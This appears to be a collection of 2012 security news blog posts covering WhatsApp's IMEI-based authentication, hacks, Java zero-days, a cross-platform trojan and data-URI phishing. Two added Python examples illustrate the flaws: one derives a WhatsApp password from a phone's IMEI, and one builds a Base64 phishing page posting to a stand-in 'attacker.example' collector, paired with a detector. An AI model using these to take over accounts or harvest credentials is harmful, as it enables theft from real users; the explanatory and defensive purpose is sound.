WhatsApp Uses a Potentially Insecure Authentication Mechanism

WhatsApp has been criticized for lax security on multiple occasions. In May last year, WhatsApp accounts could be hijacked without the user knowing, and in January this year the status of a WhatsApp user could be changed remotely. Both vulnerabilities were fixed soon after. A longer-lived concern was that WhatsApp sent its messages in plaintext; this was reported in May 2011 and not fixed until May this year. The most serious weakness, however, lies in its authentication mechanism itself.


The Wikipedia page for WhatsApp outlines its technical specifics as follows:

WhatsApp uses a customized version of the open standard Extensible Messaging and Presence Protocol (XMPP). Upon installation, it creates a user account using one’s phone number as username (Jabber ID: [phone number]@s.whatsapp.net) and an MD5-hashed, reversed-version of the phone’s IMEI as password.

An analysis by Sam Granger shows how easy it is to leverage this information and actually gain access to a user account. WhatsApp uses exactly the mechanism described on the Wikipedia page: the password is the MD5 hash of the reversed IMEI, with no salt and no obfuscated MD5 variant; in short, no deviation from what is written down. The IMEI is not a secret (it is printed on the device and its packaging and is available to software running on the phone), so anyone who knows a user's phone number and IMEI can compute the password offline without ever touching WhatsApp's servers.
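As an added example (this is not code from the page or from Sam Granger's analysis), the following Python reproduces the credential derivation exactly as the Wikipedia description states it and contrasts it with what a per-device credential should look like. The phone number and IMEI are constructed sample values, and the function names are my own.

```python
import hashlib
import secrets
from typing import Tuple

# Constructed sample values for illustration only; not a real subscriber or device.
SAMPLE_PHONE = "15551234567"
SAMPLE_IMEI = "490154203237518"   # well-formed: its last digit is a valid Luhn check digit


def luhn_valid(digits: str) -> bool:
    """Return True if the digit string passes the Luhn check used for IMEI check digits."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def normalize_imei(imei: str) -> str:
    """Strip separators such as '49-015420-323751-8' and validate the 15-digit IMEI."""
    digits = "".join(ch for ch in imei if ch.isdigit())
    if len(digits) != 15 or not luhn_valid(digits):
        raise ValueError("not a well-formed 15-digit IMEI")
    return digits


def jabber_id(phone: str) -> str:
    """Username as described on the page: the phone number at s.whatsapp.net."""
    return f"{phone}@s.whatsapp.net"


def legacy_password(imei: str) -> str:
    """Password as the Wikipedia description on the page states it: the MD5 hex digest
    of the reversed IMEI. No salt, no per-account secret, nothing contributed by the
    server, so the result depends only on a value that is not secret."""
    digits = normalize_imei(imei)
    return hashlib.md5(digits[::-1].encode("ascii")).hexdigest()


def legacy_credentials(phone: str, imei: str) -> Tuple[str, str]:
    """Everything needed to log in as this user, given only phone number and IMEI."""
    return jabber_id(phone), legacy_password(imei)


def random_device_secret() -> str:
    """What a per-device credential should look like instead: 256 bits from the OS
    CSPRNG, generated once at registration and held only by the device and the server.
    No device identifier lets a third party recompute it."""
    return secrets.token_hex(32)


if __name__ == "__main__":
    jid, pw = legacy_credentials(SAMPLE_PHONE, SAMPLE_IMEI)
    print(jid, pw)                      # recomputable by anyone who has the IMEI
    print(random_device_secret())       # different on every call
```

The point the derivation makes concrete is that the IMEI check digit is the only thing standing between a guessed or harvested number and a valid password; the hash adds no secrecy because its input is public.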

WhatsApp has to get its security straight. It has been under constant criticism for over a year now, and it is time WhatsApp made the first security-related move instead of waiting for someone to point out flaws and then patching them.

For an intriguing discussion on this topic, read this Hacker News thread.

Al-Jazeera Hacked by Syrian Hacker Group Al-Rashedon

Al-Rashedon, a Syrian hacker group, has hacked a slew of Al-Jazeera websites over their reporting of the unrest in Syria. The hack affected Al-Jazeera’s English and Arabic websites and left them defaced with this image on Tuesday.


The group posted a message to Al-Jazeera as seen in the image, saying,

In response to your stand against Syria (Government and the People) And your support to terrorist groups in addition to spreading lies and made up news.. We have hacked your website and this is our retaliation.

The group accuses Al-Jazeera of spreading fabricated news and supporting armed terrorist groups. Syria has another well-known hacker group, the Syrian Electronic Army, but there has been no word from them on this hack, and Al-Jazeera has not commented officially either.

Qatar-based Al-Jazeera takes a lot of heat from authoritarian governments such as Egypt, Syria and the Saudi kingdom for its aggressive coverage of instability in the region. Al-Jazeera has also seen an exodus of journalists over what they considered biased reporting on Syria, and a few months ago its official Twitter account was hacked by Assad loyalists. The political situation in the Middle East is tense and disturbing, and Al-Jazeera may well be steered by its government to reflect that government's foreign policy. Either way, this is a clear illustration of what a modern political conflict looks like when everything runs on computer systems, and everything is equally vulnerable.

Over a Million Apple Device UDIDs Leaked by Hackers as Part of AntiSec

Back in August this year, NSA Director General Keith Alexander addressed the DefCon crowd for the first time and called upon hackers to join the NSA and strengthen America's cyber-security infrastructure. When asked whether the government keeps profiles of Americans and spies on them, however, he issued the usual denial. William Binney, a former technical director at the NSA who was also present at DefCon, asserted that such spying was indeed happening and that it was the reason he left the NSA in 2001.


Now, hacker groups claim to have proof that the FBI is spying on people. They have released a lengthy announcement as part of the #AntiSec movement, and the FBI has been put on the spot. The Pastebin announcement contains a long rant and a list of doxes said to have been obtained from an FBI laptop:

During the second week of March 2012, a Dell Vostro notebook, used by Supervisor Special Agent Christopher K. Stangl from FBI Regional Cyber Action Team and New York FBI Office Evidence Response Team, was breached using the AtomicReferenceArray vulnerability in Java. During the shell session some files were downloaded from his Desktop folder; one of them, with the name of “NCFTA_iOS_devices_intel.csv”, turned out to be a list of 12,367,232 Apple iOS devices including Unique Device Identifiers (UDID), user names, name of device, type of device, Apple Push Notification Service tokens, zipcodes, cellphone numbers, addresses, etc. The personal details fields referring to people appear many times empty, leaving the whole list incomplete in many parts. No other file in the same folder makes mention of this list or its purpose.

The paste became the most visited Pastebin paste ever within 24 hours. It also raises questions. What would the FBI be doing with 12 million Apple UDIDs, push tokens and contact details? Why would such a file sit unencrypted on a laptop, where a single Java exploit could expose it? There are too many unanswered questions here; Apple and the FBI should respond.

Update: The FBI denied possessing any such file.

Phishing 2.0; Phishing Without Fake Webpages

Most people are familiar with phishing attacks by now: obtaining confidential information from a victim by communicating with them (by email, phone call, etc.) while posing as someone else. The typical phishing attack involves cloning a login page, hosting it on a server and emailing the victim a link to it. A new paper by InfoSec student Henning Klevjer shows how an attacker can phish without hosting the fake login page on a server at all.

This method uses the data URI scheme. A URI (Uniform Resource Identifier) is a string of characters that identifies a name or a resource; a data URI carries the resource itself (here, the code of the login page) inside the URI, in the following form:

data:[<mediatype>][;base64],<data>

Here <data> holds the fake login page. Creating a phishing URI starts with building a login page from the code of the original page, modified so that entered data such as passwords are sent to a location of the attacker's choosing. The page is then encoded with Base64, a method of encoding binary data as ASCII text that increases the size by about 33%. The final step is to place this encoded page in the <data> part of the URI.

The resulting URI is extremely long and suspicious-looking, but because all major browsers support the data URI scheme, it renders as a normal page as long as it stays within the browser's maximum URL length.

Although the long URI can be hidden behind a URL-shortening service, Henning notes that the method has some major limitations due to the way Chrome and Internet Explorer implement data URIs.
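The procedure described above, end to end, as an added example that is not from Klevjer's paper: the Python below wraps a constructed stand-in for a cloned login page in a Base64 data URI, parses data URIs back per the data:[<mediatype>][;base64],<data> form, and adds the check a mail or proxy filter would want, flagging an HTML data URI that carries a password field posting to an absolute URL. The collector address attacker.example is hypothetical, and the HTML is a constructed sample.

```python
import base64
from html.parser import HTMLParser
from typing import Tuple
from urllib.parse import unquote_to_bytes, urlsplit

# Constructed stand-in for a cloned login page. The form action points at a
# hypothetical attacker-controlled collector; the paper does not name one.
CLONED_LOGIN_HTML = (
    "<html><body><h1>Sign in</h1>"
    '<form action="https://attacker.example/collect" method="post">'
    '<input name="user"><input type="password" name="pass">'
    "<button>Sign in</button></form></body></html>"
)


def build_data_uri(html: str, mediatype: str = "text/html") -> str:
    """Final step of the procedure: Base64-encode the page and wrap it as
    data:<mediatype>;base64,<data>. Base64 emits 4 output chars per 3 input bytes."""
    b64 = base64.b64encode(html.encode("utf-8")).decode("ascii")
    return f"data:{mediatype};base64,{b64}"


def parse_data_uri(uri: str) -> Tuple[str, bool, bytes]:
    """Split a data URI of the form data:[<mediatype>][;base64],<data> into
    (mediatype, was_base64, decoded payload). Handles the percent-encoded
    (non-Base64) form as well."""
    if uri[:5].lower() != "data:":
        raise ValueError("not a data URI")
    header, sep, payload = uri[5:].partition(",")
    if not sep:
        raise ValueError("data URI has no ',' separating header and payload")
    params = header.split(";")
    mediatype = params[0].strip().lower() or "text/plain"   # RFC 2397 default
    is_base64 = any(p.strip().lower() == "base64" for p in params[1:])
    data = base64.b64decode(payload) if is_base64 else unquote_to_bytes(payload)
    return mediatype, is_base64, data


class _FormScanner(HTMLParser):
    """Collect form actions and note whether any password field is present."""

    def __init__(self) -> None:
        super().__init__()
        self.actions = []
        self.has_password_field = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.has_password_field = True


def looks_like_credential_harvester(uri: str) -> bool:
    """Detection check: flag a data URI carrying an HTML document with a password
    field whose form posts to an absolute URL. A page living inside a data URI has
    no server of its own, so a login form in one can only submit credentials
    somewhere else."""
    try:
        mediatype, _, data = parse_data_uri(uri)
    except ValueError:
        return False
    if not mediatype.startswith("text/html"):
        return False
    scanner = _FormScanner()
    scanner.feed(data.decode("utf-8", errors="replace"))
    if not scanner.has_password_field:
        return False
    return any(urlsplit(action).netloc for action in scanner.actions)


if __name__ == "__main__":
    uri = build_data_uri(CLONED_LOGIN_HTML)
    print(len(CLONED_LOGIN_HTML), "bytes of HTML ->", len(uri), "chars of URI")
    print("flagged:", looks_like_credential_harvester(uri))
```

The detector deliberately ignores the Base64 disguise: it decodes the payload first and inspects the resulting HTML, so shortening or re-encoding the link does not change the verdict once the final URI is resolved.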

You can read more about this method here (PDF).

Via: Naked Security

Another day, Another Java Vulnerability Discovered!

So you have read about the recent vulnerabilities in Java that attackers used to spread malware, installed the out-of-band update Oracle released to close them, and think it is time to move on to other stories? Think again.

Computerworld is reporting that another serious vulnerability in the latest update has been discovered that could allow an attacker to escape the Java security sandbox and run arbitrary code on the system. It was found by the Polish security firm Security Explorations and has been reported to Oracle, according to CEO Adam Gowdiak, who says the firm will not release technical details until Oracle issues a fix.

In an email to IDG News Service, he states,

“Once we found that our complete Java sandbox bypass codes stopped working after the update was applied, we looked again at POC codes and started to think about the possible ways of how to fully break the latest Java update again,” Gowdiak said. “A new idea came, it was verified and it turned out that this was it.”

Oracle has not indicated whether it will release another out-of-band update or fold the fix into the scheduled October update. With vulnerabilities being found at this pace, it may be time for Oracle to reconsider its four-month patch cycle: the longer a known vulnerability stays unpatched, the greater the chance that it is used against users.

For now, the best option is to disable Java if you do not really use it. Alternatively, disable the Java plugin in your primary browser and keep a secondary browser only for the web apps that require Java (if you absolutely need them and are sure they are not rogue), so that the Java-enabled browser never wanders into compromised websites that exploit Java vulnerabilities.

First Cross Platform Trojan Affecting Linux and Mac OS X Revealed

Russian security firm Dr.Web has identified a new Trojan, BackDoor.Wirenet.1, that runs on both Linux and Mac OS X. It is the first cross-platform Trojan found to affect both of these operating systems.

Little information is available about this malware yet, but research is ongoing and it is said to steal passwords from all of the popular browsers (Safari, Chrome, Opera and Chromium) and from applications such as Thunderbird, SeaMonkey and Pidgin.

According to Dr.Web, when executed, the Trojan copies itself into the user’s home directory: %home%/WIFIADAPT.app.app on Mac OS X and ~/WIFIADAPT on Linux. The presence of either path is a simple indicator to check for.

Cross-platform Trojans are not rare; Trojans that affect both Windows and Macs have been identified before. One recently discovered Trojan checked which operating system the victim was running and downloaded a matching payload. Another, found in May, used an unpatched Java vulnerability to open backdoors on Windows and Mac. But as noted above, this is the first cross-platform Trojan affecting Mac and Linux. We will update this article as more details are released.

Via: Hacker News

Critical Zero Day Java Vulnerability Wreaking Havoc

A critical zero-day vulnerability in Java is causing widespread alarm. The flaw is being exploited in the wild and exploit code is readily available; Metasploit was the first to publish a proof-of-concept that works across a variety of browsers. The vulnerability is still unpatched, and although no criminal cases have been reported yet, there is no guarantee it is not already being abused. The safest course is to disable the Java plugin in your browser until Oracle releases a fix.

This security hole affects all releases in the Java 7 branch. It works across all browsers, including Google Chrome, often touted as unbreakable and secure. Chrome's sandbox covers only the bundled Adobe Flash plugin by default; the Java plugin runs outside it. Java is platform independent, and the exploit rides on that to reach all popular platforms (Windows, Linux and Mac) with little effort. Most dangerous of all, the vulnerability lets malicious code disable the Java Security Manager altogether, removing every restriction the applet sandbox would normally impose.

The exploit has been seen installing a variant of the Poison Ivy trojan, served from servers in China, and Oracle has not yet released any statement on a fix. Sophos's Naked Security blog writes,

In his conversation with the Blackhole author Krebs was told that exploits like this could go for $100,000 on the black market. That shows how effective attacks using this type of vulnerability can be.

Security experts are working on an unofficial patch for this vulnerability, since Oracle's next scheduled Java update is not until 16 October.


Information Security: Are we Evolving Fast Enough?

In the last two decades, we have seen a lot of changes around us. We have moved from standard-definition to high-definition content and from dial-up internet to high-speed broadband, and the way we interact with devices is changing too, with touch and voice input becoming common. We have also changed how we communicate and store data: much of it now lives online in the cloud, and most communication happens online through Twitter, Facebook and the like.

Along with these changes, our security policies are changing too. As we trust more and more of our data to technology companies, it is vital to think hard about their security procedures. In the early nineties, security policies were framed around the core principles known as CIA: confidentiality, integrity and availability. But times have changed, and so have the bad guys. We can no longer rely on the old principles alone; our security policies have to evolve, and fast. But are we moving fast enough? Let’s take a look.

Just a few weeks ago, WIRED editor Mat Honan’s iCloud account was compromised along with his Amazon account. Using the hijacked iCloud account, the attacker remotely wiped his iPhone, iPad and MacBook. How? Shockingly, just by calling Apple customer support. The attacker gathered all the information needed to take over the account from the internet and from Amazon through social engineering. You can read the entire story here.

This is just one example; there are many incidents like it, and most of today’s attacks use social engineering as the preferred method. But has the technology sector evolved enough to protect itself and its customers from such attacks? The truth is that, while certain companies are trying their best, many do not think outside the box. In a SANS white paper titled “A Multi-Level Defense Against Social Engineering”, David Gragg quotes Keith A. Rhodes, chief technologist at the U.S. General Accounting Office, as follows.

He notes, “Very few companies are worried about this. Every one of them should be.”

Considering that a large number of attacks in 2011 used social engineering, his words clearly still hold. Yet companies are not training their staff to detect social engineering tactics. For example, many tech companies rely on personal information to reset passwords; in the age of social networks, that information is easy to obtain, as the Mat Honan incident showed. By not taking the current technological ecosystem into consideration, these companies are effectively creating a loophole that attackers can exploit.

But every time a data breach occurs, can we blame the company or the client? Ted Claypoole, author of ‘Protecting Your Internet Identity: Are You Naked Online?’, says that at certain levels, preventing hacking is simply impossible.

“Everyone is hacked.  Sometimes a company has a big loss, and other times smaller losses. But professional criminals are testing weaknesses all the time, technology changes constantly, and all businesses have been a victim, or will be a victim. Some never know it.

There is no such thing as impenetrable security.  For a thing to have value, you must be able to use it.  And if you can reach it to use it, then so can a bad guy.  Sometimes they impersonate the account holder.  Sometimes they take jobs inside the company and become the security flaw.  Sometimes they exploit the technology.  But every company has “insufficient security policies” by your measure, because every company is vulnerable. Anyone who tells you that their major company has never been breached is either lying, naïve or both.

Last year a hacker, probably foreign government sponsored, broke into RSA, one of our very top security companies, and took information that could allow the hackers to hack defense contractors (like Lockheed Martin).

Our financial protection from harm lies not in company security policies, but in the system itself. This is why we have a $50 fraud limit on our credit cards, and why, when someone breaks in to steal up to $100,000 of your money from the bank, they did not just steal your money – they either stole the bank’s money or the government’s money, and yours will be returned. The system eats billions in fraud each year and we all pay a little bit for it, so that the losses are not as unevenly distributed if it happens to you. So I question your assumption that companies who are hacked have insufficient security policies. Resources are limited. We can all spend only so much time and money on security. Sometimes you can have the top security in the world, and the bad guys are simply better.”

And that is certainly true. At times, the bad guys are simply too good for us to prevent an incident. But that should not deter us from creating strong security policies and training staff to prevent incidents like the one that happened to Mat. The truth is that most breaches would have been entirely avoidable (96% of breaches in 2011, according to the Verizon Business Data Breach Investigations Report, 2011). For example, Microsoft India’s online store was hacked last year and passwords and credit card data were stolen. The company that ran the store on Microsoft's behalf had stored the passwords in plaintext rather than hashing them, making the attacker's job a walk in the park.

So what can we do to improve our current security infrastructure? We need a holistic approach to creating security policies that takes the latest trends and attack methods into account, with policies that evolve as fast as the attack vectors do. This is not easy, but it has to be done to safeguard our data. We could have an internationally recognised security certification process, similar to ISO 27001, that audits a company's security policies and practices and rates the company on them. This would help customers choose the best providers in terms of security and give companies the necessary ‘push’ to frame the right policies.

Furthermore, governments can pass laws that prioritize the safeguarding of consumer data. Unfortunately, there is no solid law in the US that focuses on the protection of consumer data, says Ted. “Lawmakers in the United States are doing very little to force protection of user’s data. Other industrialized nations believe that data privacy and data security is a human right that their citizens hold. This country does not yet acknowledge any such right. We have laws protecting certain specific classes of information in certain circumstances – some health care data, financial data, and children’s information – but our data protection laws are confused and disjointed.”

While senators are busy trying to pass laws such as SOPA for the benefit of the entertainment industry, it would be nice if they spent a little of their valuable time on solid laws to protect our data and our online identities. Only effective security policies, backed by strong laws, can bring durable change to the security infrastructure so that we can sleep tight without worrying about our data.

Patch Tuesday: Microsoft and Adobe Release Critical Patches

It’s that day of the month when you have to fire up Windows Update and install all of those precious security updates. Both Microsoft and Adobe have released a number of updates, which are available for download right now.

Microsoft's release consists of nine bulletins, five of which are rated critical, the highest severity rating; the rest are rated important. Together they fix 26 vulnerabilities in Windows, Internet Explorer, Exchange Server, SQL Server, server software, developer tools and Office. You can use Windows Update or download the updates from the Download Center; if you have automatic updates enabled (as you should), they have probably been installed already.

Adobe, for its part, has released three security bulletins covering Reader, Acrobat, Shockwave and Flash. The Reader and Acrobat updates fix about 20 vulnerabilities in both the Windows and Mac OS X versions. The Flash Player update, the most important of the three, fixes a vulnerability (CVE-2012-1535) which Adobe says has been exploited in the wild in a limited number of attacks. The Shockwave Player update addresses five memory corruption vulnerabilities that could lead to code execution.

For more information on the Microsoft updates, visit the MSRC. To download the Adobe updates, visit Adobe's security bulletins and advisories section.

Make sure to install these updates as soon as possible for better protection from online threats.

Bitcoinica Sued for $460,457.70 over Lost Bitcoins Due to Lax Security

Bitcoin grew extremely popular over the last year, even as the value of a Bitcoin fell from a whopping $15 to $3. Although it seems to have stabilized around $9 after a recent rise, the Bitcoin ecosystem is not free of trouble. Bitcoinica, the flagship Bitcoin trading platform, has attracted a lot of attackers and has suffered two major security breaches.


Bitcoinica started as a one-man show by Zhou Tong, who soon put together a team to manage the promising business. But the platform has been plagued by attacks, and the response from the people at Bitcoinica has not been reassuring. In a disturbing statement made in May, Bitcoinica admitted to having neglected user security, saying,

The recent security breach was not beyond our team’s skills to prevent. We know better. But we did not address relevant issues as quickly as was needed.

Now users of the Bitcoinica platform are suing it for $460,457.70 over lost Bitcoins, covering the value of the lost coins and other damages. Bitcoinica lost 43,554 Bitcoins (worth $87,000) in the first hack and 18,547 Bitcoins ($90,000) in the second.

The suit does not come out of the blue: Bitcoinica twice promised to cover its users' losses, first pledging to repay all Bitcoins lost to the hacking and later pledging to repay 50% of them, and failed to live up to either promise. The discontent does not end there; the plaintiffs also accuse Bitcoinica of following corrupt processes.

For a currency that emerged with a global outlook and a dream of trading free of government intervention, the Bitcoin ecosystem has just fallen flat on its face with these attacks and this court case.